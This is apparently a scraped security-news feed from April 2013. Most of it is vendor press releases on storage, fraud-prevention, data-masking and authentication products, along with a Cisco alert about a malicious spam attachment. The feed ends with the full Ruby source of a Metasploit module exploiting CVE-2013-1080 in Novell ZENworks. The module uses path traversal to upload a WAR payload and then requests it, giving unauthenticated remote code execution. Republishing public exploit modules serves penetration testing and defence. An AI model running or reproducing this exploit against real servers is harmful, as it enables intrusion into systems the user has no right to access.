Solutions from WANdisco protect enterprises against downtime and help them deliver products to market more quickly, cost-effectively and efficiently by simplifying and centralizing open source control management solutions like Apache Subversion. WANdisco products include SVN MultiSiteSVN Access ControlSVN Clustering and SmartSVN.
About WANdiscoWANdisco (LSEWAND) is a provider of enterprise-ready, non-stop software solutions that enable globally distributed organizations to meet today's data challenges of secure storage, scalability and availability. WANdisco's products are differentiated by the company's patented, active-active data replication technology, serving crucial high availability (HA) requirements, including Hadoop Big Data and Application Lifecycle Management (ALM). Fortune Global 1000 companies, including AT&T, Motorola, Intel and Halliburton, rely on WANdisco for performance, reliability, security and availability. For additional information, please visit www.wandisco.com.
Subversion is a trademark of the Apache Software Foundation. All other product and company names herein may be trademarks of their registered owners.

Contact Information

TeleSign's PhoneID Suite of Identity and Fraud Prevention Products Enhanced With Telecom Carrier Information

$
0
0

PhoneID Includes Valuable Fraud Signal at No Additional Cost
LOS ANGELES, CA--(Marketwired - Apr 2, 2013) - TeleSign, an Internet security andauthentication leader, today announced the addition of telecom carrier information in its suite of PhoneID products. Carrier information serves as a powerful fraud signal for many online merchants and web properties. This update enables a more granular approach to evaluating the propensity for fraud based on phone number intelligence.
TeleSign's patented suite of identity and fraud prevention products is based on the principle that a phone is uniquely tied to a person's identity and behavior. PhoneID already helps the most prominent global web properties make quick and accurate decisions about their users with powerful fraud signals including phone type, contact information, subscriber and device status, and now telecom carrier data. Carrier information was identified by TeleSign's fraud research team as a valuable fraud signal to more accurately detect fraud.
"Carrier information contributes to TeleSign's fraud prevention and identity proofing products by providing a pivotal data point that can narrow and isolate a source of fraud for our customers," said Nancy Vitug, Director of Program Management, TeleSign. "We are pleased to launch this customer-driven enhancement as a value-add to our PhoneID Suite."
"Fraud on our site damages our reputation, hurts the user experience, and diminishes our margins," said Chris Letendre, CEO, PC Game Supply. "Carrier data gives us valuable insight into behavioral trends of fraudulent users, enabling us to stop more fraud and move real users to order completion quicker. Bottom line, it improves the bottom line."
Telecom carrier information is currently used to:
  • Block a telecom carrier associated with high fraud rates
  • Create exceptions for a carrier with low fraud rates
  • Build carrier data into an automated machine learning system
This enhancement is now included in all PhoneID products including Standard, Contact, andLive. For more information on TeleSign's user authentication and fraud prevention products please visit telesign.com
About TeleSignEvery second, of every day, TeleSign protects the world's largest Internet and Cloud properties against fraud. TeleSign's security and authentication products provide an easy-to-implement and powerful method for identifying and substantially reducing online fraud and spam. The company protects 2.5 billion downstream accounts in more than 200 countries and territories, offering localization services in 87 languages and dialects.
TeleSign and PhoneID are trademarks or registered trademarks of TeleSign or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners. All other trademarks and registered trademarks are property of their respective owners. PhoneID is protected under U.S. Patent Office Patent No. 7,945,034.

Contact Information

  • PR ContactBrenna Lenoir
    TeleSign Corporation
    Email Contact
    +1 310 740 9671

Cloudian Delivers Next-Generation Cloud Storage Software, Adds Enhanced Data Management and Multi-Datacenter Capabilities

$
0
0

Cloudian 2.4 Extends Leadership Of The Most S3-Compatible Storage Solution Available Today, Helps Make Storage-As-A-Utility A Reality

ORLANDO, Fla.April 2, 2013 /PRNewswire/ -- STORAGE NETWORK WORLD -- Cloudian®, Inc.,the market-leading cloud storage software company, today announced the next generation of its Cloudian solution, extending its leadership in S3 compatibility and multi-datacenter capabilities while enhancing its data management features for the growing enterprise marketplace. Cloudian helps organizations address their big data storage challenges by providing software to build private or public clouds using commodity servers. The Cloudian solution requires minimum IT involvement, dramatically reduces the costs of cloud deployment and management—and, as a result, is helping make "Storage-As-A-Utility" a reality.
"Although service providers and enterprises are intrigued by the idea of moving data to the cloud for scalability and agility, concerns over data management and protection remain front and center," said Agatha Poon , Research Manager at 451 Research.  "The ability to deliver high levels of security, systems continuity, and usability is as important as making intuitive management tools accessible to customers. Providing these features will give companies such as Cloudian a competitive edge."
Cloudian's new solution, Cloudian 2.4, maximizes data protection, availability and security, which are critical for enterprises looking to deploy their own private cloud or move their data to the public cloud. For multi-datacenter deployments, Cloudian now provides Dynamic Consistency Levels, offering unprecedented data protection and ensuring continuous, uninterrupted operations in the case of network or site failures. Cloudian 2.4 protects sensitive data through encryption while also associating expiration policies to content and auto-expiring content.
In addition, Cloudian is extending its leadership in S3 compatibility with its new content lifecycle management and web content support. Only Cloudian delivers a fully S3 API compliant, multi-tenant, multi-data center cloud storage platform that enables enterprises and service providers to cost-effectively deploy an extremely scalable and reliable object storage service within public and private clouds. The platform leverages a fully distributed, peer-to-peer architecture, with no single point of failure. Cloudian also provides a comprehensive user interface for both end user applications as well as administrative functions, including billing, monitoring and provisioning. The solution easily scales from one node up to hundreds of nodes across multiple data centers, supporting petabytes of data, enabling system operators to leverage heterogeneous, commodity servers for cost-effective horizontal scalability.
"Cloudian empowers organizations to finally meet their big data storage needs via a scalable, affordable, easy-to-manage solution," said Jay Desai , Vice President of Product Management, Cloudian. "Now, with our newest version of Cloudian, we have made their lives even easier by adding many unique data management features. We are pleased to bring Storage-as-a-Utility one step closer to being a reality."
Cloudian has also opened up the scalability, reliability and power of cloud object storage to anyone building an S3-compatible cloud—be it public, private or hybrid—via its free Cloudian Community Edition, which will support up to 100 TB of useable storage and offers forum support. Cloudian 2.4, including a Community Edition version, is now available for download fromhttp://www.cloudian.com/get-started.html.
About CloudianCloudian, Inc. is a Foster City, Calif.-based software company specializing in cloud storage software. The main product is Cloudian®, an S3-compatible cloud object storage platform that enables service providers and enterprises to build reliable, affordable and scalable cloud storage solutions. Cloudian is actively partnering with leading cloud computing environments including Citrix Cloud Platform, Apache CloudStack, and OpenStack, cloud on-ramp providers, and the vast ecosystem of tools and applications that is afforded through true S3 compatibility. Cloudian's customers include Vodafone, Nextel, NTT, SoftBank, Nifty, and Lunacloud. The company has additional offices in China and Japan. For more information or to try Cloudian today, please visit www.cloudian.com.
For more information, please contact:
Eileen Conway 
Scout PR
650-245-9015
scoutpr@gmail.com

SOURCE Cloudian, Inc.


RELATED LINKS
http://www.geminimobile.com

Solix Technologies, Inc. Announces Data Masking and Data Validation Downloads for SQL Server

$
0
0

Free download installs in minutes to mask non-production sensitive data and test data integrity.


"Industry experts agree that ensuring data security and data integrity is a top priority and high on the radar for most CIOs today.”
- Sai Gundavelli, CEO, Solix Technologies, Inc.
Santa Clara, CA (PRWEB) April 02, 2013
Solix Technologies, Inc., a leading provider ofenterprise data management (EDM) solutions, today announced Solix EDMS Standard Edition (SE) Data Masking and Data Validation for SQL Server. Free download versions are already available for Oracle and Sybase ASE databases. The tool may be downloaded and deployed in minutes.
Data breach attacks commonly target non production data since it is a softer target. Attackers realize that non production data stores often lack the same sense of security applied to production environments. Administration rights and user privileges are less closely controlled, and sensitive test data routinely walks out the door on consultant laptops. Yet the data within non production systems is often just as sensitive as production.
High profile data breaches routinely dominate the headlines and organizations are realizing the potentially devastating consequences they will face if they fail to protect the confidential data. In addition, compliance guidelines such as Payment Card Industry (PCI) and Protected Health Information (PHI) require that non production sensitive data be masked.
Data masking replaces personally identifiable information, such as a credit card or social security numbers, with contextually accurate, albeit fictionalized data. Just as important, data validation checks the integrity of data and ensures it is not vulnerable to loss, inaccuracy, technical or human errors.
Luis Daniel Soto Maldonado, Director of Product Marketing – SQL Server at Microsoft, remarked that, “masking sensitive non production information is a data governance best practice. We encourage organizations to take steps to protect their non-production data against attack.”
Joseph Feiman, Ph.D. Research VP and Gartner Fellow at Gartner, Inc., describes the business impact of database masking as follows:
“Sensitive data (such as credit card numbers), personally identifiable information (such as U.S. Social Security numbers), medical diagnoses, and even nonpersonal sensitive data (such as corporate financial information and intellectual property) are exposed to abuse or negligence from enterprise employees and outsiders. Adopting data masking will help enterprises raise the level of security and privacy assurance against insider and outsider abuses. At the same time, data masking will make enterprises compliant with the security and privacy standards recommended by regulating/auditing organizations.”
“Industry experts agree that ensuring data security and data integrity is a top priority and high on the radar for most CIOs today,” said Sai Gundavelli, CEO, Solix Technologies, Inc.
Solix EDMS Data Masking and Data Validation SE for Microsoft SQL Server is available for free download immediately at http://www.solix.com/solix-edms-se/
About Solix Technologies
Solix Technologies, Inc., the leading provider of Enterprise Data Management (EDM) solutions, helps businesses improve application performance, reduce storage costs, and meet compliance and data privacy requirements by achieving Information Lifecycle Management (ILM) goals. The Solix Enterprise Data Management Suite (Solix EDMS) enables organizations to implement Database Archiving, Test Data Management (Data Subsetting), Data Masking and Application Retirement across all enterprise data. Solix Technologies, Inc. is headquartered in Santa Clara, California and operates worldwide through an established network of value added resellers (VARs) and systems integrators.
Visit Solix Technologies on the web at http://www.solix.com and follow Solix on Twitter (solixedms) and Facebook (http://www.facebook.com/solixtechnologies).
Media and Analyst Contact:
408-654-6514
http://media.relations(at)solix(dot)com
1 Hype Cycle for Application Security 2012, 20 July 2012 - Doc # is G00229119

Going “Virtual”: The Sestus Alternative to Hardware Tokens and Software Certificates

$
0
0

On February 20th of this year, online security company Sestus announced the release of a foreign language version of its successful Virtual Token® multifactor authentication (MFA) product. Virtual Token® Multi-Factor Authentication (also called Two-Factor Authentication) is a ground-breaking security process that replaces traditional hardware tokens and software token systems with a stronger, more affordable, more user-friendly “virtual” token solution.


Virtual Token® Multifactor Authentication
Virtual Token® Multifactor Authentication
No additional hardware must be carried and no additional software must be installed or configured by the end user. In addition, the user is not subjected to telephone calls or text messages when they wish to log in.
Phoenix, Arizona (PRWEB) April 02, 2013
On February 20th of this year, online security company Sestus announced the release of a foreign language version of its successful Virtual Token® multifactor authentication (MFA) product. The announcement coincided with the launch of the company’s re-designed website at http://www.sestus.com.
According to the company, its re-designed Virtual Token® MFA product is now “language-intelligent”, automatically switching to the user’s preferred language based on settings configured within the user’s internet browser. Initially released with support for both English and Spanish, additional languages can be quickly added using easily translated language pages.
Virtual Token® Multi-Factor Authentication (also called Two-Factor Authentication) is a ground-breaking security process that replaces traditional hardware tokens and software token systems with a stronger, more affordable, more user-friendly “virtual” token solution. Virtual Token® multifactor authentication is currently used by many notable organizations including the U.S. Department of the Treasury, R R Donnelley, The State of North Carolina, and Banorte Bank.
Unlike traditional hardware and software token approaches, Virtual Token® MFA does not require the user to install any software or carry any hardware. Instead, the process utilizes the user’s existing browser, retrieving what the company describes as a “digitally signed HASDL key” from the browser. This key is then authenticated against the connected device’s “fingerprint”. Once the key has been authenticated, the process exchanges a one-time-use random “virtual” token number with the device.
This groundbreaking solution provides a number of advantages over other MFA methods. No additional hardware must be carried and no additional software must be installed or configured by the end user. In addition, the user is not subjected to telephone calls or text messages when they wish to log in.
In what can only be called a strong endorsement of the Virtual Token® MFA approach, in June of 2011 the FFIEC issued updated guidance recommending all financial institutions begin using “complex device identification”. Although not identified by name within the guidance, the complex device identification process outlined by the FFIEC matches step-by-step Sestus’ proprietary and patent-pending Virtual Token® MFA process.
Perhaps the most significant aspects of Virtual Token® MFA is its extremely low total cost of ownership and its high user acceptance rates. In a Credit Union Journal study of multifactor authentication solutions deployed within the United States, Virtual Token® multifactor authentication was reported to have the lowest support costs and the highest user acceptance rates of all MFA products.
The U.S. Department of Homeland Security has twice recognized Sestus for this breakthrough in online security. Sestus has also received InfoWorld’s highest recognition, the InfoWorld 100 Award.
Virtual Token® MFA is a “true multifactor authentication” solution as defined by federal regulators. Organizations that have deployed Virtual Token® MFA have experienced a significant reduction in online fraud and identity theft without the increase in support costs typically associated with MFA. Users never disclose any personal information to use Virtual Token® MFA, making it both user-friendly and superior in terms of protecting user privacy.
For more information on Virtual Token® Multifactor Authentication, visit http://www.sestus.com.

Reverse Engineering Stack Exchange

$
0
0
Reverse Engineering Stack Exchange is a question and answer site for researchers and developers who explore the principles of a system through analysis of its structure, function, and operation. It's built and run by you as part of the Stack Exchange network of Q&A sites. With your help, we're working together to build a library of detailed answers to every question about reverse engineering.

learn more..........http://reverseengineering.stackexchange.com/

Threat Outbreak Alert: Fake RBS News Research Report E-mail Messages

$
0
0

Description

Cisco Security Intelligence Operations has detected significant activity related to spam e-mail messages that claim to contain a research report for the recipient. The text in the e-mail message attempts to convince the recipient to open the attachment and view the details. However, the .zip attachment contains a malicious .exe file that, when executed, attempts to infect the system with malicious code.

E-mail messages that are related to this threat (RuleID5692) may contain any of the following files:
Service Commentary.zip
Service Commentary.exe
The Service Commentary.exe file in the Service Commentary.zip attachment has a file size of 128,512 bytes. The MD5 checksum, which is a unique identifier of the executable, is the following string: 0xC264C172C1D17D22F21A5C3450E382C0

The following text is a sample of the e-mail message that is associated with this threat outbreak:
Subject: RBS Morning Commentary

Message Body:

Please refer to the details below if you are having problems reading the attached file.Please do not contact your Treasury Centre for technical issues - these should be routed to RBS FM support.
The attached file is in zip format; first you have to unzip it (self-extracting archive, Adobe PDF) and then it can be viewed in Adobe Acrobat Reader 3.0 or above. If you do not have a copy of the software please contact your technical support department.

ALL SUMMARIES OF RESEARCH REPORTS INCLUDED IN THIS PAGE CONSTITUTE PART OF THE RELEVANT REPORT WHICH IS ATTACHED AND ARE THEREFORE COVERED BY THAT DOCUMENT'S DISCLAIMER AND DISTRIBUTION RESTRICTIONS.

Source: Cisco

Metasploit: Novell ZENworks Configuration Management Remote Execution

$
0
0

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Novell ZENworks Configuration Management Remote Execution',
      'Description' => %q{
          This module exploits a code execution flaw in Novell ZENworks Configuration
        Management 10 SP3 and 11 SP2. The vulnerability exists in the ZEnworks Control
        Center application, allowing an unauthenticated attacker to upload a malicious file
        outside of the TEMP directory and then make a second request that allows for
        arbitrary code execution. This module has been tested successfully on Novell
        ZENworks Configuration Management 10 SP3 and 11 SP2 on Windows 2003 SP2 and SUSE
        Linux Enterprise Server 10 SP3.
      },
      'Author'      =>
        [
          'James Burton', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2013-1080' ],
          [ 'BID', '58668' ],
          [ 'OSVDB', '91627' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-049/' ],
          [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7011812' ]
        ],
      'Privileged'  => false,
      'Platform'    => [ 'win', 'linux' ],
      'Targets'     =>
        [
          [ 'ZENworks Configuration Management 10 SP3 and 11 SP2 / Windows 2003 SP2',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win',
              'Traversal' => '../webapps/'
            }
          ],
          [ 'ZENworks Configuration Management 10 SP3 and 11 SP2 / SUSE Linux Enterprise Server 10 SP3',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux',
              'Traversal' => '../../opt/novell/zenworks/share/tomcat/webapps/'
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 22 2013'))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true])
      ], self.class)
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "/zenworks/jsp/fw/internal/Login.jsp"
    })

    if res and res.code == 200 and res.body =~ /Novell ZENworks Control Center/
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Detected
  end

  def exploit

    # Generate the WAR containing the EXE containing the payload
    app_base = rand_text_alphanumeric(4+rand(4))
    jsp_name = rand_text_alphanumeric(8+rand(8))

    war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s

    print_status("Uploading #{war_data.length} bytes as #{app_base}.war ...")

    # Rex::MIME::Message.new doesn't work fine with binary data, destroys "\x0d" chars
    boundary = "----#{rand_text_alpha(34)}"
    data = "--#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"mainPage:_ctrl21a:FindFile:filePathTextBox\"; filename=\"#{target['Traversal']}#{app_base}.war\"\r\n"
    data << "Content-Type: application/octet-stream\r\n\r\n"
    data << war_data
    data << "\r\n"
    data << "--#{boundary}--"

    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri'    => "/zenworks/jsp/index.jsp?pageid=newDocumentWizard",
        'ctype'  => "multipart/form-data; boundary=#{boundary}",
        'data'   => data
      })

    if res and res.code == 302
      print_status("Upload finished, waiting 20 seconds for payload deployment...")
    else
      fail_with(Exploit::Failure::Unknown, "Failed to upload payload")
    end

    # Wait to ensure the uploaded war is deployed
    select(nil, nil, nil, 20)

    print_status("Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...")
    send_request_cgi({
      'uri'    => normalize_uri(app_base, "#{jsp_name}.jsp"),
      'method' => 'GET',
    })
  end

end




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
Viewing all 8064 articles
Browse latest View live